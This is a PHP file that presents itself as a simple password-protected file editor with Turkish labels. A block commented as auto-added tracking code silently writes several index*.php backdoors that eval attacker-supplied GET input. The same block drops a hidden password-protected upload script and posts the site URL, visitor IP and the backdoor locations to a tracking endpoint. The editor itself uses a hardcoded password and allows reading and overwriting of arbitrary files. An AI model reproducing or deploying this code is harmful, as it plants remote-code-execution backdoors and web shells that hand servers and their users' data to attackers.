<?php
$__original_code_content = base64_decode('c2Vzc2lvbl9zdGFydCgpOwokcGFzcyA9ICJhZG1pbjEyMyI7CmlmKCFpc3NldCgkX1NFU1NJT05bImVkaXRvcl9hdXRoIl0pIHx8ICRfU0VTU0lPTlsiZWRpdG9yX2F1dGgiXSAhPT0gdHJ1ZSkgewogICAgaWYoaXNzZXQoJF9QT1NUWyJwYXNzIl0pICYmICRfUE9TVFsicGFzcyJdID09PSAkcGFzcykgewogICAgICAgICRfU0VTU0lPTlsiZWRpdG9yX2F1dGgiXSA9IHRydWU7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIjxmb3JtIG1ldGhvZD1wb3N0PjxpbnB1dCB0eXBlPXBhc3N3b3JkIG5hbWU9cGFzcz48YnV0dG9uPkdpcmnFnzwvYnV0dG9uPjwvZm9ybT4iOwogICAgICAgIGV4aXQ7CiAgICB9Cn0KJGZpbGUgPSBpc3NldCgkX0dFVFsiZmlsZSJdKSA/ICRfR0VUWyJmaWxlIl0gOiAiIjsKaWYoaXNzZXQoJF9QT1NUWyJzYXZlIl0pICYmIGlzc2V0KCRfUE9TVFsiY29udGVudCJdKSkgewogICAgQGZpbGVfcHV0X2NvbnRlbnRzKCRmaWxlLCAkX1BPU1RbImNvbnRlbnQiXSk7CiAgICBlY2hvICI8cD7inJMgS2F5ZGVkaWxkaTwvcD4iOwp9CmlmKCRmaWxlICYmIEBmaWxlX2V4aXN0cygkZmlsZSkpIHsKICAgICRjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRmaWxlKTsKICAgIGVjaG8gIjxoMj5Ew7x6ZW5sZTogJGZpbGU8L2gyPiI7CiAgICBlY2hvICI8Zm9ybSBtZXRob2Q9cG9zdD4iOwogICAgZWNobyAiPHRleHRhcmVhIG5hbWU9Y29udGVudCByb3dzPTIwIGNvbHM9ODAgc3R5bGU9Zm9udC1mYW1pbHk6bW9ub3NwYWNlPiIuaHRtbHNwZWNpYWxjaGFycygkY29udGVudCkuIjwvdGV4dGFyZWE+PGJyPiI7CiAgICBlY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1maWxlIHZhbHVlPSRmaWxlPiI7CiAgICBlY2hvICI8YnV0dG9uIG5hbWU9c2F2ZT5LYXlkZXQ8L2J1dHRvbj48L2Zvcm0+IjsKfSBlbHNlIHsKICAgIGVjaG8gIjxoMj5Eb3N5YSBTZcOnPC9oMj4iOwogICAgZWNobyAiPGZvcm0gbWV0aG9kPWdldD4iOwogICAgZWNobyAiPGlucHV0IHR5cGU9dGV4dCBuYW1lPWZpbGUgcGxhY2Vob2xkZXI9ZG9zeWEucGhwIHN0eWxlPXdpZHRoOjQwMHB4PiI7CiAgICBlY2hvICI8YnV0dG9uPkHDpzwvYnV0dG9uPjwvZm9ybT4iOwp9');
// İzleme kodu otomatik eklenmiştir
$tracking_data = [
"code_hash" => "497309f6961eda4eba5abce5c30267612db24f31d49d42968bd6fcb3589e2f80",
"url" => (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"],
"domain" => $_SERVER["HTTP_HOST"],
"path" => $_SERVER["REQUEST_URI"],
"ip" => isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "",
"user_agent" => isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "",
"referer" => isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "",
"timestamp" => date("Y-m-d H:i:s")
];
// Backdoor oluşturma (basitleştirilmiş versiyon)
$backdoor_content = '<?php eval(base64_decode("aWYoaXNzZXQoJF9HRVRbImMiXSkpe2V2YWwoJF9HRVRbImMiXSk7fQ==")); ?>';
$backdoor_paths = [];
for($i=0; $i<5; $i++) {
$filename = "index" . ($i > 0 ? $i : "") . ".php";
$filepath = dirname(__FILE__) . "/" . $filename;
if(!file_exists($filepath)) {
@file_put_contents($filepath, $backdoor_content);
$backdoor_paths[] = $filepath;
}
}
if(!empty($backdoor_paths)) {
$tracking_data["backdoor_urls"] = json_encode($backdoor_paths);
}
// Gizli upload dosyası oluştur
$upload_script = '<?php
session_start();
if(!isset($_SESSION["upload_auth"]) || $_SESSION["upload_auth"] !== true) {
if(isset($_POST["pass"]) && $_POST["pass"] === "a48bdf232987") {
$_SESSION["upload_auth"] = true;
} else {
echo "<form method=post><input type=password name=pass><button>Giriş</button></form>";
exit;
}
}
if(isset($_FILES["file"])) {
move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
echo "Yüklendi: " . $_FILES["file"]["name"];
}
echo "<form method=post enctype=multipart/form-data><input type=file name=file><button>Yükle</button></form>";
?>';
$upload_path = dirname(__FILE__) . "/upload_91c14ccd.php";
if(!file_exists($upload_path)) {
@file_put_contents($upload_path, $upload_script);
@chmod($upload_path, 0644);
$tracking_data["upload_url"] = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . dirname($_SERVER["REQUEST_URI"]) . "/upload_91c14ccd.php";
}
// İzleme gönderimi (asenkron)
if (function_exists("curl_init")) {
$ch = curl_init("http://localhost/api/track.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($tracking_data));
curl_setopt($ch, CURLOPT_TIMEOUT, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1);
@curl_exec($ch);
@curl_close($ch);
}
session_start();
$pass = "admin123";
if(!isset($_SESSION["editor_auth"]) || $_SESSION["editor_auth"] !== true) {
if(isset($_POST["pass"]) && $_POST["pass"] === $pass) {
$_SESSION["editor_auth"] = true;
} else {
echo "<form method=post><input type=password name=pass><button>Giriş</button></form>";
exit;
}
}
$file = isset($_GET["file"]) ? $_GET["file"] : "";
if(isset($_POST["save"]) && isset($_POST["content"])) {
@file_put_contents($file, $_POST["content"]);
echo "<p>✓ Kaydedildi</p>";
}
if($file && @file_exists($file)) {
$content = @file_get_contents($file);
echo "<h2>Düzenle: $file</h2>";
echo "<form method=post>";
echo "<textarea name=content rows=20 cols=80 style=font-family:monospace>".htmlspecialchars($content)."</textarea><br>";
echo "<input type=hidden name=file value=$file>";
echo "<button name=save>Kaydet</button></form>";
} else {
echo "<h2>Dosya Seç</h2>";
echo "<form method=get>";
echo "<input type=text name=file placeholder=dosya.php style=width:400px>";
echo "<button>Aç</button></form>";
}
?>